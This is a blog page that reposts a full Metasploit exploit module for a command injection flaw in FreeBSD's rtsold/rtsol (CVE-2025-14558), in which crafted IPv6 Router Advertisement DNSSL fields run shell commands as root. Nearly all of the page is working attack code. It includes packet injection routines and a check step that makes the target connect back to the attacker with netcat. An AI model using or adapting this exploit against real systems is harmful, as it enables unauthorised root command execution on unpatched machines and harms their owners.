Khalil Shreateh specializes in cybersecurity, particularly as a "white hat" hacker. He focuses on identifying and reporting security vulnerabilities in software and online platforms, with notable expertise in web application security. His most prominent work includes discovering a critical flaw in Facebook's system in 2013. Additionally, he develops free social media tools and browser extensions, contributing to digital security and user accessibility.

Get Rid of Ads!


Subscribe now for only $3 a month and enjoy an ad-free experience.

Contact us at khalil@khalil-shreateh.com

Latest Posts

 

 

FreeBSD rtsold/rtsol DNSSL Command Injection

Details
Written by: khalil shreateh
Category: Vulnerabilities
Hits: 95
FreeBSD rtsold/rtsol DNSSL Command Injection
FreeBSD rtsold/rtsol DNSSL Command Injection
FreeBSD rtsold/rtsol DNSSL Command Injection

##
# This module requires Metasploit: https://metasploit.com/download
# FreeBSD rtsold/rtsol DNSSL Command Injection

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Capture
include Msf::Exploit::Remote::Ipv6

def initialize(info = {})
super(
update_info(
info,
'Name' => 'FreeBSD rtsold/rtsol DNSSL Command Injection',
'Description' => %q{
This module exploits a command injection vulnerability (CVE-2025-14558)
in FreeBSD's rtsol(8) and rtsold(8) programs. These programs do not
validate the domain search list options provided in IPv6 Router
Advertisement messages; the option body is passed to resolvconf(8)
unmodified. resolvconf(8) is a shell script which does not validate
its input. A lack of quoting means that shell commands passed as input
to resolvconf(8) may be executed, enabling command injection via $()
substitution in the DNSSL domain name fields.

This exploit requires Layer 2 adjacency to the target (same network
segment) and root privileges to send raw packets. Router advertisement
messages are not routable and should be dropped by routers, so the
attack does not cross network boundaries.
},
'License' => MSF_LICENSE,
'Author' => [
'Lukas Johannes M?ller', # Metasploit module and PoC
'Kevin Day' # Vulnerability discovery
],
'References' => [
['CVE', '2025-14558'],
['URL', 'https://security.FreeBSD.org/advisories/FreeBSD-SA-25:12.rtsold.asc'],
['URL', 'https://github.com/JohannesLks/CVE-2025-14558']
],
'Platform' => ['unix'],
'Arch' => ARCH_CMD,
'Privileged' => true,
'Targets' => [
[
'FreeBSD (all versions before 13.5-RELEASE-p8 / 14.3-RELEASE-p7 / 15.0-RELEASE-p1)',
{}
]
],
'DefaultTarget' => 0,
'DisclosureDate' => '2025-12-16',
'DefaultOptions' => {
'PAYLOAD' => 'cmd/unix/generic'
},
'Notes' => {
'Stability' => [CRASH_SAFE],
'SideEffects' => [IOC_IN_LOGS],
'Reliability' => [REPEATABLE_SESSION]
}
)
)

register_options(
[
OptString.new('INTERFACE', [true, 'The network interface to use for sending RA packets']),
OptInt.new('COUNT', [true, 'Number of RA packets to send', 3]),
OptInt.new('DELAY', [true, 'Delay between packets in milliseconds', 1000])
]
)

deregister_options('RHOSTS', 'FILTER', 'PCAPFILE', 'SNAPLEN', 'TIMEOUT')
end

def check
check_pcaprub_loaded

# Use unspecified address to select default outbound interface
lhost = datastore['LHOST'] || Rex::Socket.source_address('0.0.0.0')
lport = datastore['LPORT'] || rand(44444..45444)
service = nil
client = nil

begin
service = Rex::Socket::TcpServer.create(
'LocalHost' => lhost,
'LocalPort' => lport,
'SSL' => false,
'Context' => {
'Msf' => framework,
'MsfExploit' => self
}
)

vprint_status("Started check listener on #{lhost}:#{lport}")

check_cmd = "nc -w 5 #{lhost} #{lport}"
vprint_status("Sending RA packets with check payload: #{check_cmd}")

send_ra_packets(check_cmd)

vprint_status('Waiting for connection...')

Timeout.timeout(10) do
client = service.accept
if client
vprint_good("Connection received from #{client.peerhost}")
return CheckCode::Vulnerable('Target connected back via encoded payload')
end
end
rescue Timeout::Error
return CheckCode::Safe('No connection received within timeout')
rescue RuntimeError => e
return CheckCode::Unknown("Pcaprub error: #{e}")
rescue StandardError => e
return CheckCode::Unknown("Error during check: #{e.class} - #{e}")
ensure
client.close if client
service.close if service
end

CheckCode::Safe('The rtsold did not respond, target might not be vulnerable')
end

def send_ra_packets(cmd)
interface = datastore['INTERFACE']
count = datastore['COUNT']
delay_ms = datastore['DELAY']

begin
smac = get_mac(interface)
rescue StandardError => e
fail_with(Failure::BadConfig, "Cannot get MAC address for interface #{interface}: #{e}")
end

begin
open_pcap('INTERFACE' => interface, 'ARPCAP' => false)
rescue StandardError => e
fail_with(Failure::BadConfig, "Cannot open pcap on interface #{interface}: #{e}")
end

begin
pkt = ipv6_build_ra_packet(smac, cmd, ipv6_link_address('INTERFACE' => interface))
count.times do |i|
inject(pkt.to_s)
Rex.sleep(delay_ms / 1000.0) if i < count - 1
end
ensure
close_pcap
end
end

def exploit
check_pcaprub_loaded

print_status("Sending #{datastore['COUNT']} Router Advertisement(s) with DNSSL payload...")
send_ra_packets(payload.encoded)
print_good('Router Advertisement(s) sent successfully')
end
end

Social Media Share